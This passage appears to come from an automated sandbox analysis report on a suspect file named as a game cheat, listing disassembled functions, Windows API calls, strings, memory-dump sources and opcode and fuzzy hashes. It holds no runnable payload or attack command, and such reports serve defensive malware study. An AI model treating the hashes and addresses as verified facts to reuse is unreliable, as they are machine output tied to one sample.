                                                    • _swprintf.LIBCMT ref: 00D0CED1
                                                      • Part of subcall function 00CF4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF40A5
                                                    • SetDlgItemTextW.USER32(?,00000066,00D3946A), ref: 00D0CEF1
                                                    • EndDialog.USER32(?,00000001), ref: 00D0CFFE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                    • String ID: %s%s%u
                                                    • API String ID: 110358324-1360425832
                                                    • Opcode ID: cf3d3ef25c96ecf1a00b03c41ff3a66a12ca588ab8fb6432e9ef58a15a67975c
                                                    • Instruction ID: 5a4707d03d2a86d6b1b43c31294c02e8f656ce71616aaddd1eb3dc4241a81024
                                                    • Opcode Fuzzy Hash: cf3d3ef25c96ecf1a00b03c41ff3a66a12ca588ab8fb6432e9ef58a15a67975c
                                                    • Instruction Fuzzy Hash: A8418EB1900219AADF25DBA0DC45FEE77BDEB05340F4480A6FA0DE7191EE719A448F72
                                                    Function 00CFBB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00CFBB27
                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00CFA275,?,?,00000800,?,00CFA23A,?,00CF755C), ref: 00CFBBC5
                                                    • _wcslen.LIBCMT ref: 00CFBC3B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$CurrentDirectory
                                                    • String ID: UNC$\\?\
                                                    • API String ID: 3341907918-253988292
                                                    • Opcode ID: 0330481b549d17c5b411e608b173aa053d020deb79305f8a28965f8cc4c8c3ca
                                                    • Instruction ID: 9fe52ac3a43475dc8bd5821cb6ce2de672e51873171ae7c9ffdf48fb8d57fc00
                                                    • Opcode Fuzzy Hash: 0330481b549d17c5b411e608b173aa053d020deb79305f8a28965f8cc4c8c3ca
                                                    • Instruction Fuzzy Hash: 7241A23150025DBACB61AF20DC05FFF77A9EF41390F108466FA68A3151DB70DE909AB2
                                                    Function 00D0B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadBitmapW.USER32(00000065), ref: 00D0B6ED
                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00D0B712
                                                    • DeleteObject.GDI32(00000000), ref: 00D0B744
                                                    • DeleteObject.GDI32(00000000), ref: 00D0B767
                                                      • Part of subcall function 00D0A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00D0B73D,00000066), ref: 00D0A6D5
                                                      • Part of subcall function 00D0A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00D0B73D,00000066), ref: 00D0A6EC
                                                      • Part of subcall function 00D0A6C2: LoadResource.KERNEL32(00000000,?,?,?,00D0B73D,00000066), ref: 00D0A703
                                                      • Part of subcall function 00D0A6C2: LockResource.KERNEL32(00000000,?,?,?,00D0B73D,00000066), ref: 00D0A712
                                                      • Part of subcall function 00D0A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00D0B73D,00000066), ref: 00D0A72D
                                                      • Part of subcall function 00D0A6C2: GlobalLock.KERNEL32(00000000), ref: 00D0A73E
                                                      • Part of subcall function 00D0A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00D0A762
                                                      • Part of subcall function 00D0A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D0A7A7
                                                      • Part of subcall function 00D0A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00D0A7C6
                                                      • Part of subcall function 00D0A6C2: GlobalFree.KERNEL32(00000000), ref: 00D0A7CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                    • String ID: ]
                                                    • API String ID: 1797374341-3352871620
                                                    • Opcode ID: 6b6f98cf9d8dc649d34819e42fcf4a6ace72796f7937e6e629954e94df826a4a
                                                    • Instruction ID: 198b4bfeb1bf2722f263a538ee41a95c1d4fe3ba3966f77ecfc8a995987521a8
                                                    • Opcode Fuzzy Hash: 6b6f98cf9d8dc649d34819e42fcf4a6ace72796f7937e6e629954e94df826a4a
                                                    • Instruction Fuzzy Hash: 2501AD36540715A6C7127B789C09BBF7AB9EBC0BA2F090012BD08A72D1DB628D0546B2
                                                    Function 00D0D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00CF1316: GetDlgItem.USER32(00000000,00003021), ref: 00CF135A
                                                      • Part of subcall function 00CF1316: SetWindowTextW.USER32(00000000,00D235F4), ref: 00CF1370
                                                    • EndDialog.USER32(?,00000001), ref: 00D0D64B
                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00D0D661
                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D0D675
                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 00D0D684
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ItemText$DialogWindow
                                                    • String ID: RENAMEDLG
                                                    • API String ID: 445417207-3299779563
                                                    • Opcode ID: 551d724cd53acf0547596f056bf16b93c488dbc502d0e114edb7eaf5fd5c277b
                                                    • Instruction ID: f3d68c8e3140e536d12dcec213cd73315e9564affae1722ed8cc78a4bfd7cdc2
                                                    • Opcode Fuzzy Hash: 551d724cd53acf0547596f056bf16b93c488dbc502d0e114edb7eaf5fd5c277b
                                                    • Instruction Fuzzy Hash: 4D016833284318BBD2104FF8AD49F6B775EEB9AB42F110012F749E21E4C6A399048735
                                                    Function 00D17E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D17E24,00000000,?,00D17DC4,00000000,00D2C300,0000000C,00D17F1B,00000000,00000002), ref: 00D17E93
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D17EA6
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00D17E24,00000000,?,00D17DC4,00000000,00D2C300,0000000C,00D17F1B,00000000,00000002), ref: 00D17EC9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: af02e015d55f618e31e2840337ed7d618a731c175ed8cbef00c01e532af9c553
                                                    • Instruction ID: 856e94504ac821e765945553b9d8dae4b60e3d27dcc3c2536b280abe72d85309
                                                    • Opcode Fuzzy Hash: af02e015d55f618e31e2840337ed7d618a731c175ed8cbef00c01e532af9c553
                                                    • Instruction Fuzzy Hash: 1CF03131904319BBCB219FA0EC09B9EBFB4EF54715F0440A9F805E2260DB759E45CAB4
                                                    Function 00CFF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00D0081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D00836
                                                      • Part of subcall function 00D0081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CFF2D8,Crypt32.dll,00000000,00CFF35C,?,?,00CFF33E,?,?,?), ref: 00D00858
                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CFF2E4
                                                    • GetProcAddress.KERNEL32(00D381C8,CryptUnprotectMemory), ref: 00CFF2F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                    • API String ID: 2141747552-1753850145
                                                    • Opcode ID: 58836d03ab6aa623e40876bbc857203e4e61e3728aa09c8f8f86441b6ebaaaea
                                                    • Instruction ID: cb2366169631b6db557a5f87e8c7c05d54f30adafff981fc4be7b885842ce710
                                                    • Opcode Fuzzy Hash: 58836d03ab6aa623e40876bbc857203e4e61e3728aa09c8f8f86441b6ebaaaea
                                                    • Instruction Fuzzy Hash: 3FE02630904711AEC7309F34A80DB117ED4AF24B08F00C82DF0DAD3280DBB8D1458B70
                                                    Function 00D12BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AdjustPointer$_abort
                                                    • String ID:
                                                    • API String ID: 2252061734-0
                                                    • Opcode ID: 9d17a62093414ae3fa55de332e8ff33ed09cf747843ee61b8e991a12af975570
                                                    • Instruction ID: 80c7cf56456e0484f37a4413b2694d42d6c141394683291de8b00291bf373846
                                                    • Opcode Fuzzy Hash: 9d17a62093414ae3fa55de332e8ff33ed09cf747843ee61b8e991a12af975570
                                                    • Instruction Fuzzy Hash: F0519BB1600216BFDB289F54F845BFAB7A5EF54310F284129E941466A1EB32EDE0D7F0
                                                    Function 00D1BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00D1BF39
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D1BF5C
                                                      • Part of subcall function 00D18E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D1CA2C,00000000,?,00D16CBE,?,00000008,?,00D191E0,?,?,?), ref: 00D18E38
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D1BF82
                                                    • _free.LIBCMT ref: 00D1BF95
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D1BFA4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                    • String ID:
                                                    • API String ID: 336800556-0
                                                    • Opcode ID: daea4146cb41265b31d98f42b030125beef6df9795813f020807cdf5d338d295
                                                    • Instruction ID: 82ab31314fa2185222c537fc4143f08fc24bd823f6dc0266650d6fce5b4b9787
                                                    • Opcode Fuzzy Hash: daea4146cb41265b31d98f42b030125beef6df9795813f020807cdf5d338d295
                                                    • Instruction Fuzzy Hash: 1D01A7766057157F23315AB67C4DCFB6A6DDEC6BB1318012AF904C2241EF66CD4395B0
                                                    Function 00D19869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,00D31030,00000200,00D191AD,00D1617E,?,?,?,?,00CFD984,?,?,?,00000004,00CFD710,?), ref: 00D1986E
                                                    • _free.LIBCMT ref: 00D198A3
                                                    • _free.LIBCMT ref: 00D198CA
                                                    • SetLastError.KERNEL32(00000000,00D23A34,00000050,00D31030), ref: 00D198D7
                                                    • SetLastError.KERNEL32(00000000,00D23A34,00000050,00D31030), ref: 00D198E0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$_free
                                                    • String ID:
                                                    • API String ID: 3170660625-0
                                                    • Opcode ID: 7f895945108067e8ac2fc95813580fc232c418237e95f19e6a869af3057ae4d1
                                                    • Instruction ID: 8d5002889c8bc0008ff7c7ee68faea1c73bb737946798876317f6161562b1b29
                                                    • Opcode Fuzzy Hash: 7f895945108067e8ac2fc95813580fc232c418237e95f19e6a869af3057ae4d1
                                                    • Instruction Fuzzy Hash: 8701F4362447017BC22267287DB59EBA669DBE37717250139F905D2292EF34CC865271
                                                    Function 00D00EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00D011CF: ResetEvent.KERNEL32(?), ref: 00D011E1
                                                      • Part of subcall function 00D011CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00D011F5
                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00D00F21
                                                    • CloseHandle.KERNEL32(?,?), ref: 00D00F3B
                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00D00F54
                                                    • CloseHandle.KERNEL32(?), ref: 00D00F60
                                                    • CloseHandle.KERNEL32(?), ref: 00D00F6C
                                                      • Part of subcall function 00D00FE4: WaitForSingleObject.KERNEL32(?,000000FF,00D01206,?), ref: 00D00FEA
                                                      • Part of subcall function 00D00FE4: GetLastError.KERNEL32(?), ref: 00D00FF6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                    • String ID:
                                                    • API String ID: 1868215902-0
                                                    • Opcode ID: 9de32c196d63b380ff19d5efc111d86cea35b57b3b53b593575fc7d60ce24fb0
                                                    • Instruction ID: bc98161c94ca8ddeb8ef96517c8502ecb312fe9e3b0e3e0b0d56288762d3962e
                                                    • Opcode Fuzzy Hash: 9de32c196d63b380ff19d5efc111d86cea35b57b3b53b593575fc7d60ce24fb0
                                                    • Instruction Fuzzy Hash: 68015E72100744FFC7329F64DD84BC6BBAAFB58710F000929F2AA922A0CB757A45DB74
                                                    Function 00D1C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 00D1C817
                                                      • Part of subcall function 00D18DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D1C896,00D23A34,00000000,00D23A34,00000000,?,00D1C8BD,00D23A34,00000007,00D23A34,?,00D1CCBA,00D23A34), ref: 00D18DE2
                                                      • Part of subcall function 00D18DCC: GetLastError.KERNEL32(00D23A34,?,00D1C896,00D23A34,00000000,00D23A34,00000000,?,00D1C8BD,00D23A34,00000007,00D23A34,?,00D1CCBA,00D23A34,00D23A34), ref: 00D18DF4
                                                    • _free.LIBCMT ref: 00D1C829
                                                    • _free.LIBCMT ref: 00D1C83B
                                                    • _free.LIBCMT ref: 00D1C84D
                                                    • _free.LIBCMT ref: 00D1C85F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: f9063ce6cb6a23fb7631cffa2c15390bcdcf6343633762cbdce2dfdee4918235
                                                    • Instruction ID: 89b5941abaaf498c51b3b7d3a942d2ba74ba32b9215b51c23e79991681efc143
                                                    • Opcode Fuzzy Hash: f9063ce6cb6a23fb7631cffa2c15390bcdcf6343633762cbdce2dfdee4918235
                                                    • Instruction Fuzzy Hash: 10F0E772554310BF8620EB69F8C6C9A73E9EB14B147A92819F108D7652CF71FCC08A74
                                                    Function 00D01FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00D01FE5
                                                    • _wcslen.LIBCMT ref: 00D01FF6
                                                    • _wcslen.LIBCMT ref: 00D02006
                                                    • _wcslen.LIBCMT ref: 00D02014
                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00CFB371,?,?,00000000,?,?,?), ref: 00D0202F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$CompareString
                                                    • String ID:
                                                    • API String ID: 3397213944-0
                                                    • Opcode ID: 76edfdd8dc49f1130e275b19722d219735b7462d5ff05706d90a3f520e868535
                                                    • Instruction ID: 29c95e31f1f9db660422e9fbeaeba60a5d88036f83446b5b139ecaddde7ec188
                                                    • Opcode Fuzzy Hash: 76edfdd8dc49f1130e275b19722d219735b7462d5ff05706d90a3f520e868535
                                                    • Instruction Fuzzy Hash: E4F01D32008214BBCF225F55EC49EDE7F26EB44760B118555F61A5B0A1CF72D6A1D6B0
                                                    Function 00D18900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 00D1891E
                                                      • Part of subcall function 00D18DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D1C896,00D23A34,00000000,00D23A34,00000000,?,00D1C8BD,00D23A34,00000007,00D23A34,?,00D1CCBA,00D23A34), ref: 00D18DE2
                                                      • Part of subcall function 00D18DCC: GetLastError.KERNEL32(00D23A34,?,00D1C896,00D23A34,00000000,00D23A34,00000000,?,00D1C8BD,00D23A34,00000007,00D23A34,?,00D1CCBA,00D23A34,00D23A34), ref: 00D18DF4
                                                    • _free.LIBCMT ref: 00D18930
                                                    • _free.LIBCMT ref: 00D18943
                                                    • _free.LIBCMT ref: 00D18954
                                                    • _free.LIBCMT ref: 00D18965
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 965884eb5902b17bf0650d728e0d685f0dd011187541d03bb281c44347fca91f
                                                    • Instruction ID: 2a7a6691be7d3702d908524a027b94ff63e79e5a75ed2921f373f7b45686450b
                                                    • Opcode Fuzzy Hash: 965884eb5902b17bf0650d728e0d685f0dd011187541d03bb281c44347fca91f
